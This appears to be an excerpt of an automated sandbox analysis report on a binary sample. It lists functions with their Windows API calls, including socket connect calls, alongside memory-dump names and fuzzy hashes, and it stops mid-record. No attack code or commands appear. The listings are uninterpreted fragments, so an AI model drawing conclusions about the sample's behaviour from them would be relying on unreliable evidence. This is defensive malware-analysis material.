                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$EnableMessageSend$LongShow
                                                                                                        • String ID:
                                                                                                        • API String ID: 142311417-0
                                                                                                        • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                        • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                                                        • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                        • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                                                        Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                        • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                                                        • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                        • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                                                        Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • IsWindowVisible.USER32(?), ref: 00445879
                                                                                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                                                        • _wcslen.LIBCMT ref: 004458FB
                                                                                                        • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 3087257052-0
                                                                                                        • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                                                        • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                                                        • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                                                        • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                                                                        Function 004653C8 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                        • String ID:
                                                                                                        • API String ID: 245547762-0
                                                                                                        • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                        • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                                                        • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                        • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                                                                        Function 0044719B Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                        • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                        • BeginPath.GDI32(?), ref: 0044723D
                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Object$Select$BeginCreateDeletePath
                                                                                                        • String ID:
                                                                                                        • API String ID: 2338827641-0
                                                                                                        • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                        • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                                                        • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                        • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                                                        Function 00434582 Relevance: 7.6, APIs: 5, Instructions: 61sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Sleep.KERNEL32(00000000), ref: 00434598
                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                                                        • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                                        • String ID:
                                                                                                        • API String ID: 2875609808-0
                                                                                                        • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                        • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                                                        • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                        • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                                                                        Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                                                        • MessageBeep.USER32(00000000), ref: 00460C46
                                                                                                        • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                                                        • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 3741023627-0
                                                                                                        • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                        • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                                                        • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                        • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                                                        Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                        • String ID:
                                                                                                        • API String ID: 4023252218-0
                                                                                                        • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                        • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                                                        • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                        • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                                                        Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 1489400265-0
                                                                                                        • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                        • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                                                        • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                        • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                                                        Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                        • DestroyWindow.USER32(?), ref: 00455728
                                                                                                        • DeleteObject.GDI32(?), ref: 00455736
                                                                                                        • DeleteObject.GDI32(?), ref: 00455744
                                                                                                        • DestroyIcon.USER32(?), ref: 00455752
                                                                                                        • DestroyWindow.USER32(?), ref: 00455760
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                        • String ID:
                                                                                                        • API String ID: 1042038666-0
                                                                                                        • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                        • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                                                        • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                        • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                                                        Function 0042FD29 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                        • String ID:
                                                                                                        • API String ID: 2625713937-0
                                                                                                        • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                                                        • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                                                                        • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                                                        • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                                                                        Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __getptd.LIBCMT ref: 0041780F
                                                                                                          • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                          • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                        • __getptd.LIBCMT ref: 00417826
                                                                                                        • __amsg_exit.LIBCMT ref: 00417834
                                                                                                        • __lock.LIBCMT ref: 00417844
                                                                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                        • String ID:
                                                                                                        • API String ID: 938513278-0
                                                                                                        • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                        • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                                                        • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                        • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                                                        Function 00413D0E Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                        • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                        • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                        • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                                        • ExitThread.KERNEL32 ref: 00413D4E
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                                        • __freefls@4.LIBCMT ref: 00413D74
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                        • String ID:
                                                                                                        • API String ID: 2403457894-0
                                                                                                        • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                                        • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                                                                        • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                                        • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                                                                        Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                        • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                        • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                        • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                        • ExitThread.KERNEL32 ref: 004151ED
                                                                                                        • __freefls@4.LIBCMT ref: 00415209
                                                                                                        Memory Dump Source
